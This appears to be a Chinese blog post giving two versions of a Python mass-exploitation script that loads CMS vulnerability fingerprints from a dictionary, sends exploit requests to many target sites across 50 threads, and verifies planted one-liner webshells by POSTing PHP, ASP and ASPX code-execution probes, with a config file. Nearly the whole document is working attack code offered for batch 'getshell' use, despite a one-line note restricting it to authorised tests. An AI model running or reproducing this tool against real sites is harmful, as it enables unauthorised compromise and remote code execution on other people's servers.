目標:根據上一篇寫的指紋錄入工具收集大量 CMS 等漏洞指紋(exp.dic),然後運行該腳本批量驗證並直接獲取 shell;它也可以當作路徑掃描程序使用,同時含有一句話木馬連接驗證功能。注意:腳本會向目標發送 POST 載荷並嘗試在目標上執行代碼,只能用於已獲授權的測試目標。
#coding=utf-8
import requests
import Queue
import threading
import re
queue=Queue.Queue()
#===================================================#
#exp_info: one line of exp.dic split on '|' (indices as read by scan()):
#exp_info[0] HTTP method: "POST" sends exp_info[2], anything else is a GET
#exp_info[1] test path, appended to the site URL
#exp_info[2] POST body as k=v&k2=v2; empty for GET
#exp_info[3] keyword regex matched against the response body ('|' is the
#            field separator, so regex alternation cannot be used here)
#exp_info[4] shell path, appended to the site URL
#exp_info[5] shell password (the one-liner's parameter name)
#====================================================#
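def init():
    """Load ``exp.dic`` into the shared queue, one '|'-split entry per line.

    Each line is ``method|test_path|post_data|keyword|shell_path|shell_pwd``.
    Blank lines and lines starting with '#' are skipped: the original queued
    a blank line as ``['']`` and the worker then died on IndexError.  '|' is
    the field separator, so a keyword regex cannot use '|' alternation.

    The file is closed on every path (the original leaked the handle when
    reading raised).  Raises IOError if ``exp.dic`` cannot be opened, as
    before.
    """
    with open("exp.dic") as fh:
        for line in fh:
            line = line.strip()
            if not line or line.startswith("#"):
                continue
            queue.put(line.split('|'))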
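def openUrl(url,GET_POST,pdata):
    """Fetch *url* and return ``(status_code, encoding, body)``.

    GET_POST selects the method: "POST" sends *pdata*, anything else is a
    GET.  *pdata* is the raw ``k=v&k2=v2`` string from the dictionary; it
    is turned into a dict so requests form-encodes it.  Redirects are never
    followed and every request has a 20 s timeout.

    Returns ``(0, 0, False)`` when the request fails or the status is not
    200 or 500 -- the two codes the dictionary keywords are written
    against.  ``encoding`` is whatever requests reports in ``r.encoding``
    and may be None when the response declares no charset; callers must
    cope with that.
    """
    try:
        if GET_POST == "POST":
            # Split each pair on the FIRST '=' only.  The original split on
            # every '=', so a value containing '=' (base64 payloads, "a=b=c")
            # made dict() raise and the whole request was reported as a
            # failure.  Empty segments from a trailing '&' are dropped.
            form = {}
            for pair in pdata.split("&"):
                if not pair:
                    continue
                key, _, value = pair.partition("=")
                form[key] = value
            r = requests.post(url, timeout=20, allow_redirects=False, data=form)
        else:
            r = requests.get(url, timeout=20, allow_redirects=False)
        content = r.content
        r.close()
        if r.status_code in (200, 500):
            return (r.status_code, r.encoding, content)
        return (0, 0, False)
    except requests.RequestException:
        # Timeouts, refused connections and bad URLs are routine while
        # scanning; report "no data" instead of killing the worker.  The
        # original bare except also swallowed KeyboardInterrupt and real bugs.
        return (0, 0, False)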
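def checkKeyWord(page,page_encoding,keyword):
    """Return True if the regex *keyword* matches anywhere in the response body *page*.

    *page* is the raw body from openUrl (bytes); *page_encoding* is the
    ``r.encoding`` requests reported, which may be None when the response
    declares no charset.  The original ``unicode(page, None)`` raised on
    exactly those pages and the bare except turned every fingerprint on
    them into "no match".  We now fall back to UTF-8, replace undecodable
    bytes, and retry with UTF-8 on an unknown codec name -- a fingerprint
    check should degrade to "no match" on garbage, not hide a hit behind
    an encoding error.

    A *keyword* that is not a valid regex is reported and treated as "no
    match" instead of raising re.error inside the worker thread.
    """
    if isinstance(page, bytes):
        try:
            text = page.decode(page_encoding or "utf-8", "replace")
        except LookupError:
            # Codec name from a sloppy Content-Type header that Python
            # does not know; UTF-8 is the most useful guess.
            text = page.decode("utf-8", "replace")
    else:
        text = page
    try:
        pattern = re.compile(keyword)
    except re.error:
        print("[!] bad keyword regex in dictionary, skipping: %r" % (keyword,))
        return False
    return pattern.search(text) is not None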
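def checkConnectionSuccess(shell_url,pdata):
    """POST the probe *pdata* to *shell_url* and report whether the webshell executed it.

    Every probe built by checkGetShellSuccess makes the shell print the
    literal ``test``.  The body is compared after stripping whitespace,
    because a one-liner usually has a newline after ``?>`` / ``%>`` that
    made the original exact comparison report a working shell as failed.

    Returns True on a confirmed connection and False otherwise (the
    original returned None; callers that ignore the result are unaffected).
    """
    status_code, encoding, content = openUrl(shell_url, "POST", pdata)
    # content is False when the request failed or the status was not 200/500.
    if content is not False and content.strip() == b"test":
        print(" the connection is successful ")
        return True
    print("the connection is fail")
    return False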
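def checkGetShellSuccess(shell_url,shell_pwd):
    """Probe the one-liner webshell at *shell_url* using its parameter name *shell_pwd*.

    The probe makes the shell print ``test`` so checkConnectionSuccess can
    confirm code execution.  The language is chosen from the file
    extension; query string and fragment are removed and the extension is
    lower-cased, so ``shell.PHP?x=1`` is still recognised as PHP (the
    original took everything after the last '.' of the whole URL):

    * ``php``  -> ``<pwd>=echo "test";``
    * ``asp``  -> VBScript ``execute(...)`` writing ``test``
    * anything else (the aspx/JScript one-liner) -> ``Response.Write("test")``

    *shell_pwd* is sent as the form field name, unencoded, exactly as
    before; a password containing '=' or '&' would be split incorrectly by
    openUrl, so keep dictionary passwords plain.  Returns whatever
    checkConnectionSuccess returns.
    """
    path = shell_url.split("?", 1)[0].split("#", 1)[0]
    script_type = path.rsplit(".", 1)[-1].lower()
    if script_type == 'php':
        pdata = shell_pwd + '=echo "test";'
    elif script_type == 'asp':
        pdata = shell_pwd + '=execute("response.clear:response.write(""test""):response.end")'
    else:
        pdata = shell_pwd + '=Response.Clear();Response.Write("test");'
    return checkConnectionSuccess(shell_url, pdata)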
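def output(content,status_code,page_encoding,test_url,re_keyword,shell_url,shell_pwd):
    """Print the verdict for one dictionary entry and, on a hit, probe the shell.

    content/status_code/page_encoding come from openUrl; ``content`` is
    False when the request failed or the status was not 200/500, and then
    nothing is printed.

    Fields come from a '|'-split line, so a "missing" field is the empty
    string, never None -- the original's ``is None`` tests never fired.  An
    empty keyword now explicitly means "no keyword check, the status alone
    is the hit" (which is also what ``re.compile('')`` matched by accident).
    Two of the original prints supplied two values for three ``%s``
    placeholders and raised TypeError, killing the worker before
    ``queue.task_done()`` and hanging ``queue.join()``; they now print the
    test path and the password as evidently intended.

    scan() always passes ``shell_url = url + shell_path``, so the
    "no shell" branch only fires when a caller passes an empty shell_url.
    """
    if content is False:
        return
    if content is None:
        print('[-]status[%s]---%s |no foud data' % (status_code, test_url))
        return
    hit = (not re_keyword) or checkKeyWord(content, page_encoding, re_keyword)
    if not hit:
        # 200/500 came back but the fingerprint did not: worth a manual look.
        print('[-]status[%s]---%s is possible' % (status_code, test_url))
        return
    if not shell_url:
        print('[+]status[%s]---shell url: %s | password: %s' % (status_code, test_url, shell_pwd))
        return
    print('[+]status[%s]---shell url: %s | password: %s' % (status_code, shell_url, shell_pwd))
    # Verify the dropped one-liner actually answers with its password.
    checkGetShellSuccess(shell_url, shell_pwd)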
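def scan(url):
    """Worker thread body: test every queued dictionary entry against *url*.

    Each item is a '|'-split exp.dic line
    ``[method, test_path, post_data, keyword, shell_path, shell_pwd]``;
    items with fewer than six fields are reported and skipped instead of
    raising IndexError.

    Two defects of the original are fixed here:

    * ``queue.empty()`` followed by a blocking ``get(True)`` raced with the
      other workers; a loser blocked forever and, when main() refilled the
      queue for the next site, woke up and scanned the new entries against
      the *old* url.  A non-blocking get that exits on Queue.Empty cannot.
    * ``task_done()`` was not in a ``finally``, so any exception in a worker
      (bad regex, short line, format error) left the count unbalanced and
      ``queue.join()`` in main() hung forever.
    """
    while True:
        try:
            exp_info = queue.get(False)
        except Queue.Empty:
            return
        try:
            if len(exp_info) < 6:
                print("[!] malformed dictionary line (need 6 '|' fields): %r" % (exp_info,))
                continue
            GET_POST, test_path, pdata, re_keyword, shell_path, shell_pwd = exp_info[:6]
            test_url = url + test_path
            shell_url = url + shell_path
            status_code, page_encoding, content = openUrl(test_url, GET_POST, pdata)
            output(content, status_code, page_encoding, test_url, re_keyword, shell_url, shell_pwd)
        except Exception as exc:
            # Report and keep the worker alive for the remaining entries.
            print("[!] error while testing %s against %r: %r" % (url, exp_info, exc))
        finally:
            # Always balance the get(), otherwise queue.join() never returns.
            queue.task_done()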
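if __name__=="__main__":
    threadNum = 50  # worker threads per target site
    # 2.txt holds one target per line: "host", "host/path" or a full URL.
    with open("2.txt") as f:
        for url in f:
            url = url.strip()
            if not url:
                continue  # a blank line used to be scanned as "http://"
            # Only add a scheme when none is given, so https targets and
            # already-qualified URLs are not turned into "http://http://...".
            if not url.startswith(("http://", "https://")):
                url = "http://" + url
            init()  # refill the queue for this site
            print("scanning " + url)
            for i in range(threadNum):
                # args must be a tuple; the original passed the set literal
                # {url,}, which only worked because it had exactly one element.
                t = threading.Thread(target=scan, args=(url,))
                t.daemon = True  # a wedged worker must not block interpreter exit
                t.start()
            queue.join()
    raw_input('press enter key to exit')  # keep the console window open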
利用pyinstaller 打包成exe,運行結果如下:
最新加入了一句話驗證功能
優化版本
a)添加配置文件
b)文件不存在捕獲提示
c)輸出提示更完善
getshell.py
#coding=utf-8
import requests
import Queue
import threading
import re
import ConfigParser
queue=Queue.Queue()
#===================================================#
#exp_info: one line of the exp file split on '|' (indices as read by scan()):
#exp_info[0] HTTP method: "POST" sends exp_info[2], anything else is a GET
#exp_info[1] test path, appended to the site URL
#exp_info[2] POST body as k=v&k2=v2; empty for GET
#exp_info[3] keyword regex matched against the response body ('|' is the
#            field separator, so regex alternation cannot be used here)
#exp_info[4] shell path, appended to the site URL (empty = test path is the shell)
#exp_info[5] shell password (the one-liner's parameter name)
#====================================================#
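def init(filename):
    """Load the exp dictionary *filename* into the shared queue.

    One entry per line, ``method|test_path|post_data|keyword|shell_path|shell_pwd``.
    Blank lines and '#' comment lines are skipped (a blank line used to be
    queued as ``['']`` and crashed the worker).  '|' is the field
    separator, so a keyword regex cannot use '|' alternation.

    Returns False if the file cannot be opened -- main() prints
    "exp file not found" on that -- and True otherwise.  The original bare
    except reported *every* exception, including KeyboardInterrupt, as
    "not found" and leaked the handle when reading failed part-way.
    """
    try:
        fh = open(filename)
    except IOError:
        return False
    with fh:
        for line in fh:
            line = line.strip()
            if not line or line.startswith("#"):
                continue
            queue.put(line.split('|'))
    return True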
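def openUrl(url,GET_POST,pdata):
    """Fetch *url* and return ``(status_code, encoding, body)``.

    GET_POST selects the method: "POST" sends *pdata*, anything else is a
    GET.  *pdata* is the raw ``k=v&k2=v2`` string from the dictionary; it
    is turned into a dict so requests form-encodes it.  Redirects are never
    followed and every request has a 20 s timeout.

    Returns ``(0, 0, False)`` when the request fails or the status is not
    200 or 500 -- the two codes the dictionary keywords are written
    against.  ``encoding`` is whatever requests reports in ``r.encoding``
    and may be None when the response declares no charset; callers must
    cope with that.
    """
    try:
        if GET_POST == "POST":
            # Split each pair on the FIRST '=' only.  The original split on
            # every '=', so a value containing '=' (base64 payloads, "a=b=c")
            # made dict() raise and the whole request was reported as a
            # failure.  Empty segments from a trailing '&' are dropped.
            form = {}
            for pair in pdata.split("&"):
                if not pair:
                    continue
                key, _, value = pair.partition("=")
                form[key] = value
            r = requests.post(url, timeout=20, allow_redirects=False, data=form)
        else:
            r = requests.get(url, timeout=20, allow_redirects=False)
        content = r.content
        r.close()
        if r.status_code in (200, 500):
            return (r.status_code, r.encoding, content)
        return (0, 0, False)
    except requests.RequestException:
        # Timeouts, refused connections and bad URLs are routine while
        # scanning; report "no data" instead of killing the worker.  The
        # original bare except also swallowed KeyboardInterrupt and real bugs.
        return (0, 0, False)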
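def checkKeyWord(page,page_encoding,keyword):
    """Return True if the regex *keyword* matches anywhere in the response body *page*.

    *page* is the raw body from openUrl (bytes); *page_encoding* is the
    ``r.encoding`` requests reported, which may be None when the response
    declares no charset.  The original ``unicode(page, None)`` raised on
    exactly those pages and the bare except turned every fingerprint on
    them into "no match".  We now fall back to UTF-8, replace undecodable
    bytes, and retry with UTF-8 on an unknown codec name -- a fingerprint
    check should degrade to "no match" on garbage, not hide a hit behind
    an encoding error.

    A *keyword* that is not a valid regex is reported and treated as "no
    match" instead of raising re.error inside the worker thread.
    """
    if isinstance(page, bytes):
        try:
            text = page.decode(page_encoding or "utf-8", "replace")
        except LookupError:
            # Codec name from a sloppy Content-Type header that Python
            # does not know; UTF-8 is the most useful guess.
            text = page.decode("utf-8", "replace")
    else:
        text = page
    try:
        pattern = re.compile(keyword)
    except re.error:
        print("[!] bad keyword regex in dictionary, skipping: %r" % (keyword,))
        return False
    return pattern.search(text) is not None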
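def checkConnectionSuccess(shell_url,pdata):
    """POST the probe *pdata* to *shell_url* and report whether the webshell executed it.

    Every probe built by checkGetShellSuccess makes the shell print the
    literal ``test``.  The body is compared after stripping whitespace,
    because a one-liner usually has a newline after ``?>`` / ``%>`` that
    made the original exact comparison report a working shell as failed.

    Returns True on a confirmed connection and False otherwise (the
    original returned None; callers that ignore the result are unaffected).
    """
    status_code, encoding, content = openUrl(shell_url, "POST", pdata)
    # content is False when the request failed or the status was not 200/500.
    if content is not False and content.strip() == b"test":
        print(" the connection is successful ")
        return True
    print("the connection is fail")
    return False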
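def checkGetShellSuccess(shell_url,shell_pwd):
    """Probe the one-liner webshell at *shell_url* using its parameter name *shell_pwd*.

    The probe makes the shell print ``test`` so checkConnectionSuccess can
    confirm code execution.  The language is chosen from the file
    extension; query string and fragment are removed and the extension is
    lower-cased, so ``shell.PHP?x=1`` is still recognised as PHP (the
    original took everything after the last '.' of the whole URL):

    * ``php``  -> ``<pwd>=echo "test";``
    * ``aspx`` -> JScript ``Response.Write("test")`` -- this branch exists in
      the first version of the script and was dropped here, which sent the
      VBScript probe to ASP.NET shells; it is restored.
    * anything else -> VBScript ``execute(...)`` writing ``test``

    *shell_pwd* is sent as the form field name, unencoded, exactly as
    before; a password containing '=' or '&' would be split incorrectly by
    openUrl, so keep dictionary passwords plain.  Returns whatever
    checkConnectionSuccess returns (the original returned None).
    """
    path = shell_url.split("?", 1)[0].split("#", 1)[0]
    script_type = path.rsplit(".", 1)[-1].lower()
    if script_type == 'php':
        pdata = shell_pwd + '=echo "test";'
    elif script_type == 'aspx':
        pdata = shell_pwd + '=Response.Clear();Response.Write("test");'
    else:
        pdata = shell_pwd + '=execute("response.clear:response.write(""test""):response.end")'
    return checkConnectionSuccess(shell_url, pdata)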
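def output(url,content,status_code,page_encoding,test_url,re_keyword,shell_url,shell_pwd):
    """Print the verdict for one dictionary entry and, on a hit, probe the shell.

    *url* is the bare site URL; scan() builds ``shell_url = url + shell_path``,
    so ``shell_url == url`` means the dictionary gave no shell path and the
    tested path is the shell itself (printed, not probed, as before).

    content/status_code/page_encoding come from openUrl; ``content`` is
    False when the request failed or the status was not 200/500, and then
    nothing is printed.

    Fields come from a '|'-split line, so a "missing" keyword is the empty
    string, never None -- the original's ``re_keyword is None`` branch never
    fired.  An empty keyword now explicitly means "no keyword check, the
    status alone is the hit" (which is also what ``re.compile('')`` matched
    by accident).
    """
    if content is False:
        return
    if content is None:
        print('[-]status[%s]---%s |no foud data' % (status_code, test_url))
        return
    hit = (not re_keyword) or checkKeyWord(content, page_encoding, re_keyword)
    if not hit:
        # 200/500 came back but the fingerprint did not: worth a manual look.
        print('[-]status[%s]---%s is possible' % (status_code, test_url))
        return
    if shell_url == url:
        print('[+]status[%s]---shell url: %s ' % (status_code, test_url))
        return
    print(test_url)
    print('[+]status[%s]---shell url: %s | password: %s' % (status_code, shell_url, shell_pwd))
    # Verify the dropped one-liner actually answers with its password.
    checkGetShellSuccess(shell_url, shell_pwd)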
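def scan(url):
    """Worker thread body: test every queued dictionary entry against *url*.

    Each item is a '|'-split exp line
    ``[method, test_path, post_data, keyword, shell_path, shell_pwd]``;
    items with fewer than six fields are reported and skipped instead of
    raising IndexError.

    Two defects of the original are fixed here:

    * ``queue.empty()`` followed by a blocking ``get(True)`` raced with the
      other workers; a loser blocked forever and, when main() refilled the
      queue for the next site, woke up and scanned the new entries against
      the *old* url.  A non-blocking get that exits on Queue.Empty cannot.
    * ``task_done()`` was not in a ``finally``, so any exception in a worker
      (bad regex, short line, format error) left the count unbalanced and
      ``queue.join()`` in main() hung forever.
    """
    while True:
        try:
            exp_info = queue.get(False)
        except Queue.Empty:
            return
        try:
            if len(exp_info) < 6:
                print("[!] malformed dictionary line (need 6 '|' fields): %r" % (exp_info,))
                continue
            GET_POST, test_path, pdata, re_keyword, shell_path, shell_pwd = exp_info[:6]
            test_url = url + test_path
            shell_url = url + shell_path
            status_code, page_encoding, content = openUrl(test_url, GET_POST, pdata)
            output(url, content, status_code, page_encoding, test_url, re_keyword, shell_url, shell_pwd)
        except Exception as exc:
            # Report and keep the worker alive for the remaining entries.
            print("[!] error while testing %s against %r: %r" % (url, exp_info, exc))
        finally:
            # Always balance the get(), otherwise queue.join() never returns.
            queue.task_done()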
def configRead():
config = ConfigParser.ConfigParser()
config.readfp(open('config.ini'))
test_url_file_path = config.get("file_path", "test_url_file_path")
exp_file_path = config.get("file_path", "exp_file_path")
return test_url_file_path,exp_file_path
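if __name__=="__main__":
    test_url_file_path, exp_file_path = configRead()
    threadNum = 50  # worker threads per target site
    try:
        f = open(test_url_file_path)
    except IOError:
        # Only a missing/unreadable target list is "file not found".  The
        # original bare except wrapped the whole scan and reported Ctrl-C
        # and every worker bug with this same message.
        print("test web url file not found")
    else:
        with f:
            for url in f:
                url = url.strip()
                if not url:
                    continue  # a blank line used to be scanned as "http://"
                if init(exp_file_path) is False:
                    print("exp file not found")
                    break
                # Only add a scheme when none is given, so https targets and
                # already-qualified URLs are not turned into "http://http://...".
                if not url.startswith(("http://", "https://")):
                    url = "http://" + url
                print("scanning " + url)
                for i in range(threadNum):
                    # args must be a tuple; the original passed the set literal
                    # {url,}, which only worked because it had one element.
                    t = threading.Thread(target=scan, args=(url,))
                    t.daemon = True  # a wedged worker must not block exit
                    t.start()
                queue.join()
    raw_input('press enter key to exit')  # keep the console window open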
配置文件
config.ini
[file_path]
;網站測試文件路徑
test_url_file_path=2.txt
;exp文件路徑
exp_file_path=exp.dic